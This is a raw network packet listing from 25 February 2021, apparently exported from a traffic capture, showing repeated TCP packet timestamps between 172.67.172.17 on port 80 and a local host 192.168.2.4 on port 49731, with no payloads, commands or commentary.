                                                                                                              Feb 25, 2021 15:10:41.286439896 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286463022 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286487103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286510944 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.286613941 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.287415028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287444115 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287463903 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287487984 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287519932 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.288367987 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288399935 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288424015 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288445950 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288482904 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.288526058 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.289315939 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289345026 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289370060 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289406061 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289418936 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.289448023 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.290272951 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290297985 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290326118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290349007 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290375948 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.290424109 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.291250944 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291277885 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291302919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291327000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291359901 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.291409969 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292174101 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292205095 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292227030 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292241096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292244911 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292304039 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292880058 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292907000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292933941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292947054 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292960882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292988062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292988062 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.293040037 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.293736935 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293761969 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293787003 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293811083 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293893099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.294433117 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294465065 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294488907 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294517040 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294531107 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.294543028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294583082 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.295336962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295362949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295387030 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295391083 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.295412064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295437098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295442104 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.295506954 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.296192884 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296220064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296242952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296267033 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296277046 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.296292067 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296307087 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297058105 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297087908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297113895 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297115088 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297138929 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297163963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297168016 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297214031 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297930956 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297959089 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297985077 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298008919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298033953 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298044920 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.298054934 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.298865080 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298891068 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298918962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298926115 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.298945904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298970938 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298995972 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.299036980 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.299753904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299779892 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299803019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299827099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299841881 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.299850941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299871922 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.300573111 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300597906 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300621986 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324744940 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324757099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.324769974 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324784040 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.324795961 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324805975 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.325625896 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325650930 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325675964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325704098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325717926 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.325752020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325778008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325779915 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.325795889 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.326622963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326658010 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326678038 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326694012 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.326698065 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326719999 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326723099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.326741934 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326772928 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.327564001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327595949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327615976 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327634096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.327640057 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327662945 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327677011 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.327685118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327732086 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.328532934 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328562021 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328582048 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328597069 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.328603983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328624964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328629017 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.328645945 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328661919 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.329497099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329531908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329555035 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329572916 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.329575062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329596043 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329600096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.329616070 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329632044 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.330492020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330522060 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330547094 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330564022 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.330569029 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330590963 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.330591917 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330614090 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330635071 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.331301928 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331338882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331363916 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.331367970 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331397057 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331409931 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.331425905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331455946 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331471920 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.332257986 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332309008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332319975 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.332343102 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332372904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332387924 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.332408905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332441092 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332457066 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.333179951 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333225965 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333251953 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.333255053 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333283901 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333303928 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.333311081 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333343983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333357096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334065914 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334095001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334119081 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334137917 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334140062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334163904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334173918 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334188938 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334228992 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334937096 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334969044 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334981918 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334994078 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335017920 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335042000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335045099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335064888 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335091114 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335832119 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335861921 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335886002 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335906029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335911989 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335937023 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335958958 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335961103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335983038 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.336715937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336745024 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336772919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336795092 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.336797953 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336817026 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.336822033 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336847067 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336879015 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.337588072 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337618113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337641954 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337656021 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.337666035 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337683916 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.337691069 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337718010 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337734938 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.338430882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338462114 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338484049 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338494062 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.338506937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338530064 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.338531971 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338555098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338578939 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.339296103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339330912 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339354992 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339361906 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.339375973 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339391947 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.339399099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339421988 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339448929 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.340140104 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340177059 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340200901 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340221882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340221882 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.340245962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340255022 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.509402990 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509424925 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509434938 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.509442091 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509459019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509473085 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509484053 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.509493113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509510994 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509531975 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.509531975 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.509567022 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.509598017 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510063887 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510097980 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510114908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510127068 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510145903 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510164022 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510166883 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510179996 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510195971 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510210037 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510221004 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510256052 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510519981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510538101 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510554075 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510572910 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510581017 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510590076 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510606050 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510611057 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510618925 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510636091 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510643959 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510656118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510667086 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510674000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510689974 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510703087 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510715008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510719061 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.510729074 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510740995 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510751009 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.510847092 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.511429071 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.511445999 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.511459112 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.511477947 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.511492968 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.511503935 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.511507988 CET8049731172.67.172.17192.168.2.4
